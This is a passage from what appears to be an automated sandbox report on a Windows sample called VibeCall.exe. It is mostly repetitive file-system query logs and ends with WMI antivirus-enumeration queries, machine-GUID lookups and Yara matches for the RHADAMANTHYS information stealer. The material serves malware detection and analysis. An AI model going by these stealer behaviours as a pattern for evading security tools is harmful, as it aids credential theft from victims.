                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\OpenWith.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_01427C40 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,15_3_01427C40
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Yara detected RHADAMANTHYS Stealer
                      Source: Yara matchFile source: 0000000F.00000003.2613199093.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000003.2622310523.00000000034B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000003.2748731274.00000000033A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.2762606436.0000000002BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2771328207.00000000043B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000002.2850833313.00000000045B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2675380696.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000003.2660565832.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.2712038838.0000000003550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.2813182905.0000000004D59000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.2761245461.0000000003480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000003.2664105430.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2637203150.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

                      barindex
                      Yara detected RHADAMANTHYS Stealer
